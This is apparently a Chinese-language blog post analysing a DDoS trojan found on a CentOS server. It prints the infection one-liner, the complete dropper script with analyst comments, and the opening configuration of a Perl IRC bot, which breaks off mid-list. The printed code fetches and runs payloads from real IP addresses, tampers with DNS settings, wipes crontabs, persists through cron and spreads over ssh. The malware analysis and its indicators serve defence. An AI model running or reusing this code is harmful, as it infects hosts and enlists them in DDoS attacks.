最近一段时间,所使用的 CentOS 服务器被不明人士安放了木马程序;观察发现该木马程序是用来发起 DDoS 攻击的肉鸡程序,发作时会占用绝大部分的网络带宽。
起点:
wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*
执行完上面的代码以后,你的机器就已经中招了。以下是所下载和执行的代码:
# Dropper script "a" served from http://65.254.63.20/a -- the file the one-liner
# above fetches and pipes into sh. It has no shebang and is run as `sh a` in the
# caller's current directory, so every relative path below resolves there.
# Analyst notes are added as comments; the script lines themselves are unchanged.
#
# Stages, as the code shows them:
#   1. detect an existing install ($plm) and the CPU "aes" flag ($plt)
#   2. kill competitors, wipe the user's crontab, fetch payloads (apache +
#      httpd.conf, bundled .so files, the .mail perl bot), persist via
#      /etc/cron.daily/anacron, launch, delete the downloads
#   3. harvest ssh targets from known_hosts / .bash_history and re-run the same
#      one-liner on each target over ssh
#   4. clear shell history
#
# Indicators visible in this script: 65.254.63.20, 223.255.145.158,
# "nameserver 8.8.8.8" written over /etc/resolv.conf, /etc/cron.daily/anacron,
# /usr/local/bin/sysmonitord, /tmp/.h, and processes named apache/apache2
# started with "-c httpd.conf".
#
# Non-empty when a process with "httpd.conf" on its command line is already
# running -- i.e. this script's own payload (see `./apache -c httpd.conf`
# below). Used as an "already installed" marker by both install blocks.
plm=`ps x |grep httpd.conf|grep -v grep`
# Non-empty when /proc/cpuinfo lists the "aes" CPU flag; decides whether the
# second block fetches the "apacheaes" variant.
plt=`cat /proc/cpuinfo|grep aes`
#pgrep perl |sed '1d;' |xargs kill -9
# Block 1: install only when no instance is running. The bare `echo` in the
# then-branch is a no-op filler.
if [ "$plm" != "" ]
then
echo
else
# Remove leftovers from earlier runs in cwd plus /usr/local/bin/sysmonitord.
rm -rf apache* httpd.conf* /usr/local/bin/sysmonitord
# Overwrites (does not append to) the host's resolver config -- a clear
# tamper indicator and something to restore during cleanup.
echo 'nameserver 8.8.8.8'> /etc/resolv.conf
#/sbin/iptables -A OUTPUT -p tcp --dport 45560 -j ACCEPT
# Kills anything matching "stratum" (a mining-pool protocol name; presumably
# competing miners -- unconfirmed) and any earlier copy of the payload.
kill -9 `ps x|grep stratum|awk '{print $1}'`
kill -9 `ps x|grep httpd.conf|grep -v grep|awk '{print $1}'`
#killall -9 sysmonitord sh wget curl
# Deletes the invoking user's entire crontab without backup; legitimate jobs
# are lost and must be recovered from backups, not from the running host.
crontab -r
# Fetch private copies of libcrypto/libssl/libcurl/libldap/liblber into cwd
# and point LD_LIBRARY_PATH at cwd so the downloaded binary loads them. All
# transfers are plain HTTP with no integrity check. The export only affects
# this shell and its children, which is all the script needs.
if [ -f libcurl.so.4 ] ; then
echo
else
wget 223.255.145.158/libcrypto.so.6 > /dev/null 2>&1
wget 223.255.145.158/libcurl.so.4 > /dev/null 2>&1
wget 223.255.145.158/libssl.so.6 > /dev/null 2>&1
wget 223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1
wget 223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1
curl -O http://223.255.145.158/libcrypto.so.6 > /dev/null 2>&1
curl -O http://223.255.145.158/libssl.so.6 > /dev/null 2>&1
curl -O http://223.255.145.158/libcurl.so.4 > /dev/null 2>&1
curl -O http://223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1
curl -O http://223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1
export LD_LIBRARY_PATH=`pwd`
fi
# Main payload ("apache") and its config; wget and curl are both tried so
# that whichever tool exists wins. The .mail file is a perl IRC bot (listed
# later on this page) and is executed two ways -- piped straight from wget,
# then via curl/fetch + `perl .mail` -- before being deleted. `fetch` is the
# BSD downloader, so the script is meant to run on BSD hosts as well.
curl -O http://65.254.63.20/apache > /dev/null 2>&1
wget -qO - http://65.254.63.20/.mail | perl
curl -O http://65.254.63.20/.mail > /dev/null 2>&1
fetch http://65.254.63.20/.mail > /dev/null 2>&1 ; perl .mail ; rm -rf .mail*
wget http://65.254.63.20/apache > /dev/null 2>&1
wget http://65.254.63.20/httpd.conf > /dev/null 2>&1
curl -O http://65.254.63.20/httpd.conf > /dev/null 2>&1
# Persistence: installs a copy of this script as /etc/cron.daily/anacron, but
# only when that path does not already exist. When hunting, check the file's
# contents, not just its presence.
if [ -f /etc/cron.daily/anacron ] ; then
echo
else
wget -O /etc/cron.daily/anacron http://65.254.63.20/a > /dev/null 2>&1 ; chmod +x /etc/cron.daily/anacron
curl -O http://65.254.63.20/a > /dev/null 2>&1; mv a /etc/cron.daily/anacron ; chmod +x /etc/cron.daily/anacron
fi
# Launch detached in a subshell, wait briefly, then delete the downloads. The
# process keeps running from an unlinked file, so /proc/<pid>/exe reports
# "(deleted)" -- a useful hunting signal. `&>` is a bash-ism.
chmod +x apache
(exec ./apache -c httpd.conf &> /dev/null &)
sleep 2
rm -rf wget* apache* httpd*
fi
# Block 2: also gated on "no instance running". Note the inversion: when the
# CPU does NOT report the aes flag the "apacheaes" variant is fetched, renamed
# apache2 and started as well; when aes is present nothing happens here.
# httpd.conf is fetched again from the same URL as above.
if [ "$plm" != "" ]
then
echo
else
if [ "$plt" != "" ]
then
echo
else
wget http://65.254.63.20/apacheaes > /dev/null 2>&1
curl -O http://65.254.63.20/apacheaes > /dev/null 2>&1
wget http://65.254.63.20/httpd.conf > /dev/null 2>&1
curl -O http://65.254.63.20/httpd.conf > /dev/null 2>&1
chmod +x apacheaes
mv apacheaes apache2
(exec ./apache2 -c httpd.conf &> /dev/null &)
fi
fi
# Block 3 (spreading): runs once, keyed on the presence of /tmp/.h. Intended
# target list = first field of root's known_hosts entries (with and without a
# ",..." suffix), IPv4 literals grep'd from root's and every /home/*/ user's
# .bash_history, and the 2nd/3rd word of any "ssh" command in those histories.
# Each target is then ssh'd as the *current* user with host-key checks off and
# the original one-liner is run there. No credentials are supplied, so this
# can only succeed where non-interactive ssh auth (keys or an agent) already
# works -- one reason to keep agent forwarding and passphrase-less keys off
# servers. Hashed known_hosts entries would yield unusable hash strings.
#
# Note on the redirections: `> /tmp/.h > /dev/null` opens /tmp/.h (creating or
# truncating it) and then redirects stdout again; the last redirection wins, so
# the harvested entries go to /dev/null and /tmp/.h is left empty, and the
# for-loop iterates over nothing. As written this stage appears inert under
# bash/dash -- confirm on the actual shell before assuming no lateral movement.
if [ -f /tmp/.h ] ; then
echo
else
cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h > /dev/null 2>&1
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1
for i in `cat /tmp/.h` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*") > /dev/null 2>&1 ; done
fi
# Presumably meant as anti-forensics. It acts on the non-interactive `sh`
# running this script and never writes a history file, so the users' on-disk
# .bash_history files (which this script only reads) remain worth examining.
history -rc
以上 shell 脚本的主要动作是:下载并执行相关程序,以启动相应的服务进程;然后读取 known_hosts 和 .bash_history 等文件,从中解析出曾访问过的 IP 地址/主机名,并以当前用户身份通过 ssh 登录这些主机、再次执行同样的一行命令(即:下载并执行上述 shell 脚本),以达到感染其他机器的目的。
上面的 wget -qO - http://65.254.63.20/.mail | perl 所下载并执行的 Perl 代码:
#!/usr/bin/perl
# IRC bot fetched from http://65.254.63.20/.mail and piped straight into perl
# by the dropper above. This view shows only the top-of-file configuration;
# the connect / command-dispatch code that reads these values lies past the
# end of the excerpt, so the role of each setting is inferred from its name
# unless stated otherwise. There is no `use strict`/`use warnings`, and
# $servidor below is an undeclared package global.
#
# Defender-relevant indicators in this block: the C2 host 213.152.3.19
# (@server) and port 8080 (@rports), channel "#x", nick "V", ident "xxx",
# working directory /tmp, and `uname -a` being executed at startup.
my @mast3rs = ("G");                 # presumably nicks allowed to command the bot -- confirm in the handler code
my @hostauth = ("localhost");        # presumably hostmasks the masters must connect from -- verify in the auth code
my @admchan=("#x");                  # IRC channel(s) the bot presumably joins and takes commands on
my @server = ("213.152.3.19");       # candidate C2 IRC server(s); one is picked at random below
$servidor= $server[rand scalar @server] unless $servidor;   # random pick; not `my`-scoped, so it can be pre-set from outside
my $xeqt = "!say";                   # command prefix / trigger string (inferred from the name)
my $homedir = "/tmp";                # directory the bot presumably uses as its home / working dir
my $shellaccess = 1;                 # flag; the name suggests remote shell command execution is enabled -- TODO confirm
my $xstats = 1;                      # flag whose meaning cannot be determined from this excerpt
my $pacotes = 1;                     # "pacotes" is Portuguese for "packets"; likely gates the flood commands -- unconfirmed
my $linas_max = 5;                   # likely a cap on lines of output relayed to IRC -- unconfirmed
my $sleep = 6;                       # a delay in seconds (inferred); consumed by code outside this view
my $portime = 4;                     # meaning not determinable here
my @fakeps = ("/usr/bin/httpd");     # name(s) the bot presumably masquerades under ($0 rewrite not visible here); matches the dropper's apache/httpd.conf theme
my @nickname = ("V");                # IRC nick(s) the bot uses
my @xident = ("xxx");                # IRC ident / username
my @xname = (`uname -a`);            # runs `uname -a` at load time; the output (with its trailing newline) is presumably used as the IRC realname
#################
# Random Ports
#################
my @rports = ("8080");               # IRC server port(s); only one entry, so the "random" choice is fixed here
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
"\001Snak for Macintosh 4.9.8 English\001",
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
"\001ircN 8.00 ^_-^_ he tries to tell me what I put inside of me ^_-^_\001",
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1??9] : Keep it to yourself!\001",
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10